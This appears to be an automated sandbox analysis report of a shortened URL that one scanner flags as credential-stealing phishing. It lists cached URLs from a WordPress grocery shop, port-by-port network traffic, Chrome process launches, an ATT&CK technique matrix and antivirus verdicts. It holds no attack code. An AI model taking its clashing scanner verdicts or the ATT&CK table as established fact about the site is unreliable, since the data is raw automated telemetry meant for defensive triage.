Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/2024/02/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/cart/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/category/uncategorized/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/checkout/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/comments/feed/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/feed/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/hello-world/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/how-to-make-apple-cider-vinegar/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/my-account/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/honey/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/natural-juice/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/oils/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/olives/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/pancake-syrup/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/peppers/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/pickles/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/sauces/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/spreads/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/uncategorized/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/product-category/vinegar/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/sample-page/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/shop/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gi
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/wp-json/
Source: chromecache_41.2.drString found in binary or memory: https://gardenfresheg.com/xmlrpc.php?rsd
Source: chromecache_41.2.drString found in binary or memory: https://gmpg.org/xfn/11
Source: chromecache_41.2.drString found in binary or memory: https://wordpress.org
Source: chromecache_41.2.drString found in binary or memory: https://wordpress.org/themes/grocery-store/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: classification engineClassification label: mal48.win@17/6@10/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1948,i,14795089436548518358,10330703935156435624,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/X0-7Q"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1948,i,14795089436548518358,10330703935156435624,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://t.ly/X0-7Q100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://t.ly/X0-7Q0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://gardenfresheg.com/wp-content/themes/grocery-store/assets/css/grocery-store-common.css?ver=1.00%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.30%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/style.css?ver=1.0.00%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.ttf0%Avira URL Cloudsafe
https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/assets/owl.carousel.cs0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.css?ver=6.4.30%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/owl.carousel.js?ver=6.0%Avira URL Cloudsafe
https://gardenfresheg.com/0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/pickles/0%Avira URL Cloudsafe
https://gardenfresheg.com/my-account/0%Avira URL Cloudsafe
https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/peppers/0%Avira URL Cloudsafe
https://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/pancake-syrup/0%Avira URL Cloudsafe
https://gardenfresheg.com/wp-json/0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/honey/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/woocommerce.css?ver=1.0.00%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/uncategorized/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.10%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/sticky-sidebar/jquery.sticky-sideba0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?v0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/wp-plugin-hostgator/vendor/newfold-labs/wp-module-patter0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/frontend.js?ver=1.0.00%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/spreads/0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/natural-juice/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store.js?ver=1.0.00%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/per0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/css/rd-navbar.css?ver=2.20%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/sauces/0%Avira URL Cloudsafe
https://gardenfresheg.com/checkout/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/icofont/icofont.css?ver=1.0.10%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/js/frontend.js?ver=201600%Avira URL Cloudsafe
